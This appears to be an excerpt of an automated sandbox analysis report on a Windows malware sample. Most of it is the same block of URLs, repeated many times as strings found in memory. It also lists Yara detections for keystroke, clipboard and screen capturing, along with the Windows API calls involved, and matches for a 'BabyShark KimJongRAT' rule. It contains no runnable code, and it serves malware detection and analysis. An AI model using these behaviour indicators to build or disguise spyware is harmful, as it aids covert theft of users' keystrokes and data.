https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.co
m%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 0000000A.00000003.300264453.0000000002288000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.300134040.0000000002288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2
542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000009.00000003.297406475.0000000000A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000013.00000003.319838251.0000000000B24000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332209381.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332158682.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332908452.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.332070404.0000000000B34000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.346413135.0000000002214000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345161813.0000000002214000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345356530.0000000002214000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.345265864.0000000002214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000013.00000003.319209144.0000000000B24000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.318983737.0000000000B24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000013.00000003.318840744.0000000000B24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exe, 00000006.00000003.281713896.0000000002268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.281366728.0000000002268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: file://192.168.2.1/all/patchSubSystemMemory.au3res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674499004;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/about:blankhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=1&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=4&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=122&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=251&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/m
            Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara match | File source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000008.00000002.506849716.0000000002B09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.241428213.0000000003B52000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000000.241802515.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.506906598.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.505271904.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.238788828.0000000003960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: slowday.exe PID: 6820, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6872, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: winlogons.exe PID: 6236, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3736, type: MEMORYSTR
            Source: C:\Users\user\Desktop\slowday.exe | Code function: 0_2_00DC2344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 2_2_0040F078 OpenClipboard,GetLastError,DeleteFileW,
            Source: C:\Users\user\Desktop\slowday.exe | Code function: 0_2_00E4CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Window created: window name: CLIPBRDWNDCLASS
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Window created: window name: CLIPBRDWNDCLASS

            System Summary

            Source: 35.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 35.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
            Source: 30.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
